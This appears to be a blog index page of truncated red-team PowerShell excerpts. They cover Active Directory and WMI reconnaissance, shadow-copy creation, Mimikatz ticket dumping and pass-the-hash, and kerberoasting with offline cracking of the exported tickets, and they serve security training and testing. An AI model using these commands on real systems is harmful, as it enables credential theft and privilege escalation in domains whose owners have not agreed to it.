Powershell * RED TEAM SECURITY

Information Gathering – Active Directory

PS C:\Windows\system32> Get-WmiObject -Namespace root\directory\ldap –List PS C:\Windows\system32> Get-CimClass -Namespace root\directory\ldap Get the current domain: It will give name of current domain: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-WmiObject -Namespace root/directory/ldap -Class ds_domain | select -ExpandProperty ds_dc PS C:\Windows\system32> (Get-WmiObject -Class win32_computersystem).domain Get the current domain policy: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-WmiObject -Namespace root/directory/ldap -Class ds_domain | select DS_lockoutduration, DS_Lockoutobservationwindow, DS_locakoutThreshold,…

Powershell * WMI

Red Team WMI

PS C:\> Get-WmiObject -Class win32_IP4RouteTable PS C:\> Get-WmiObject -Class win32_useraccount PS C:\> Get-WmiObject -Class win32_group PS C:\> Get-WmiObject -Class win32_shadowcopy PS C:\> (Get-WmiObject -Class win32_shadowcopy -List).create(“c:\”,”clientaccesible”) PS C:\> $link = (Get-WmiObject -Class win32_shadowcopy).deviceobject + “\” PS C:\> cmd /c mklink /d c:\shadowcopy “$link” Gather information from the local box: Invoke-sessiongopher.ps1 : PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> . .\Invoke-SessionGopher.ps1…

Powershell * POWERSHELL SECURITY

Privesc kerberos

Discover domain computers which have unconstrained delegation enabled using powerview : PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer –Unconstrained Using active directory module : PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer –Unconstrained PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter {trustedfordelegation -eq $true} Run the following command on it to check if anyDA token is available: PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”sekurlsa::tickets”‘ PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”sekurlsa::pth /user:administrator…

Powershell * POWERSHELL SECURITY

Domain Privesc

Find user accounts used as service accounts : PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1 PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Get-ADUser -filter {serviceprincipalname -ne “$null”} -Properties serviceprincipalname Check if the TGS has been granted : PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> klist Export all ticket using mimitakz : PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::list /export”‘ https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py PS C:\Users\victim.SECURITY\Downloads\kerberoast-master\kerberoast-master> python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt .\2-40a50000-victim@ldap~WIN-2RUMVG5JPOC.security.local~security.local-SECURITY.LOCAL.kirbi…